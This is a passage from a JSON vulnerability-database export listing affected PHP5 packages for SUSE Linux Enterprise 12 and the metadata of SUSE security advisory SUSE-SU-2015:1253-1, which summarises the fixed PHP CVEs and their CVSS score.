"php5-soap-5.5.14-30.1.s390x.rpm", "packageName": "php5-soap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-suhosin-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-suhosin-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-xmlwriter-5.5.14-30.1.s390x.rpm", "packageName": "php5-xmlwriter", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-dom-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-dom-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-sysvshm-5.5.14-30.1.s390x.rpm", "packageName": "php5-sysvshm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-ldap-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-ldap-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-pgsql-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-pgsql-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-wddx-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-wddx-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-debugsource-5.5.14-30.1.x86_64.rpm", "packageName": "php5-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-fileinfo-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-fileinfo-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-mysql-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-mysql-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-tokenizer-5.5.14-30.1.s390x.rpm", "packageName": "php5-tokenizer", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-xmlreader-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-xmlreader-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-pdo-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-pdo-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-xmlrpc-5.5.14-30.1.x86_64.rpm", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-zip-5.5.14-30.1.x86_64.rpm", "packageName": "php5-zip", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-suhosin-5.5.14-30.1.x86_64.rpm", "packageName": "php5-suhosin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "apache2-mod_php5-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "apache2-mod_php5-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-exif-5.5.14-30.1.x86_64.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-ldap-5.5.14-30.1.s390x.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-pspell-5.5.14-30.1.x86_64.rpm", "packageName": "php5-pspell", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-sockets-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-sockets-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-mcrypt-5.5.14-30.1.x86_64.rpm", "packageName": "php5-mcrypt", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-debugsource-5.5.14-30.1.x86_64.rpm", "packageName": "php5-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-openssl-5.5.14-30.1.s390x.rpm", "packageName": "php5-openssl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-fpm-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-fpm-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-json-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-json-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-zip-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-zip-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-iconv-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-iconv-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-ldap-5.5.14-30.1.x86_64.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-pgsql-5.5.14-30.1.s390x.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-fpm-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-fpm-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-tokenizer-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-tokenizer-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-odbc-5.5.14-30.1.x86_64.rpm", "packageName": "php5-odbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-zip-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-zip-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-json-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-json-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-gd-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-gd-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "apache2-mod_php5-5.5.14-30.1.x86_64.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-json-5.5.14-30.1.x86_64.rpm", "packageName": "php5-json", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-xmlrpc-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-xmlrpc-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-bcmath-5.5.14-30.1.s390x.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-ftp-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-ftp-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-xmlrpc-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-xmlrpc-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-dba-5.5.14-30.1.x86_64.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-sysvshm-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-sysvshm-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-sysvshm-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-sysvshm-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-mcrypt-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-mcrypt-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-bz2-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-bz2-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "noarch", "packageFilename": "php5-pear-5.5.14-30.1.noarch.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-pcntl-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-pcntl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-pgsql-5.5.14-30.1.x86_64.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-dba-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-dba-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-devel-5.5.14-30.1.s390x.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-sysvmsg-5.5.14-30.1.s390x.rpm", "packageName": "php5-sysvmsg", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-fastcgi-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-fastcgi-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-dom-5.5.14-30.1.x86_64.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-openssl-5.5.14-30.1.x86_64.rpm", "packageName": "php5-openssl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-mbstring-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-mbstring-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-openssl-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-openssl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-zlib-5.5.14-30.1.s390x.rpm", "packageName": "php5-zlib", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-mysql-5.5.14-30.1.x86_64.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-zlib-5.5.14-30.1.x86_64.rpm", "packageName": "php5-zlib", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-odbc-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-odbc-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-wddx-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-wddx-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-gmp-5.5.14-30.1.s390x.rpm", "packageName": "php5-gmp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-bcmath-5.5.14-30.1.x86_64.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-xmlreader-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-xmlreader-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-mbstring-5.5.14-30.1.s390x.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "apache2-mod_php5-5.5.14-30.1.s390x.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-pspell-5.5.14-30.1.s390x.rpm", "packageName": "php5-pspell", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-sysvsem-5.5.14-30.1.s390x.rpm", "packageName": "php5-sysvsem", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-tokenizer-5.5.14-30.1.x86_64.rpm", "packageName": "php5-tokenizer", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-iconv-5.5.14-30.1.s390x.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-intl-5.5.14-30.1.s390x.rpm", "packageName": "php5-intl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-fastcgi-5.5.14-30.1.s390x.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-xsl-5.5.14-30.1.x86_64.rpm", "packageName": "php5-xsl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-gmp-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-gmp-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-devel-5.5.14-30.1.x86_64.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-ctype-5.5.14-30.1.s390x.rpm", "packageName": "php5-ctype", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-zlib-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-zlib-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-sysvshm-5.5.14-30.1.x86_64.rpm", "packageName": "php5-sysvshm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-debugsource-5.5.14-30.1.s390x.rpm", "packageName": "php5-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-sockets-5.5.14-30.1.s390x.rpm", "packageName": "php5-sockets", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-snmp-5.5.14-30.1.x86_64.rpm", "packageName": "php5-snmp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-calendar-5.5.14-30.1.x86_64.rpm", "packageName": "php5-calendar", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-xmlrpc-5.5.14-30.1.s390x.rpm", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "ppc64le", "packageFilename": "php5-debugsource-5.5.14-30.1.ppc64le.rpm", "packageName": "php5-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "apache2-mod_php5-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "apache2-mod_php5-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-xmlwriter-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-xmlwriter-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-xmlwriter-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-xmlwriter-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-xsl-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-xsl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-bz2-5.5.14-30.1.s390x.rpm", "packageName": "php5-bz2", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-suhosin-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-suhosin-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-bcmath-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-bcmath-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-fastcgi-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-fastcgi-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-shmop-5.5.14-30.1.x86_64.rpm", "packageName": "php5-shmop", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-snmp-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-snmp-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-shmop-5.5.14-30.1.s390x.rpm", "packageName": "php5-shmop", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-curl-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-curl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-pdo-5.5.14-30.1.s390x.rpm", "packageName": "php5-pdo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-sqlite-5.5.14-30.1.x86_64.rpm", "packageName": "php5-sqlite", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-exif-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-exif-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "ppc64le", "packageFilename": "php5-debuginfo-5.5.14-30.1.ppc64le.rpm", "packageName": "php5-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-sqlite-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-sqlite-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-gettext-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-gettext-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-xmlreader-5.5.14-30.1.s390x.rpm", "packageName": "php5-xmlreader", "operator": "lt"}], "description": "This security update of PHP fixes the following issues:\n\n Security issues fixed:\n\n * CVE-2015-4024 [bnc#931421]: Fixed multipart/form-data remote DOS\n Vulnerability.\n * CVE-2015-4026 [bnc#931776]: pcntl_exec() did not check path validity.\n * CVE-2015-4022 [bnc#931772]: Fixed and overflow in ftp_genlist() that\n resulted in a heap overflow.\n * CVE-2015-4021 [bnc#931769]: Fixed memory corruption in\n phar_parse_tarfile when entry filename starts with NULL.\n * CVE-2015-4148 [bnc#933227]: Fixed SoapClient's do_soap_call() type\n confusion after unserialize() information disclosure.\n * CVE-2015-4602 [bnc#935224]: Fixed an incomplete Class unserialization\n type confusion.\n * CVE-2015-4599, CVE-2015-4600, CVE-2015-4601 [bnc#935226]: Fixed type\n confusion issues in unserialize() with various SOAP methods.\n * CVE-2015-4603 [bnc#935234]: Fixed exception::getTraceAsString type\n confusion issue after unserialize.\n * CVE-2015-4644 [bnc#935274]: Fixed a crash in php_pgsql_meta_data.\n * CVE-2015-4643 [bnc#935275]: Fixed an integer overflow in ftp_genlist()\n that could result in a heap overflow.\n * CVE-2015-3411, CVE-2015-3412, CVE-2015-4598 [bnc#935227], [bnc#935232]:\n Added missing null byte checks for paths in various PHP extensions.\n\n Bugs fixed:\n\n * configure php-fpm with --localstatedir=/var [bnc#927147]\n * fix timezone map [bnc#919080]\n\n", "edition": 1, "reporter": "Suse", "published": "2015-07-17T10:12:10", "title": "Security update for php5 (important)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4601", "CVE-2015-4644", "CVE-2015-4148", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-3411", "CVE-2015-4600", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598", "CVE-2015-4643"], "modified": "2015-07-17T10:12:10", "id": "SUSE-SU-2015:1253-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00026.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:28:41", "references": ["https://bugzilla.suse.com/936408", "https://bugzilla.suse.com/920865", 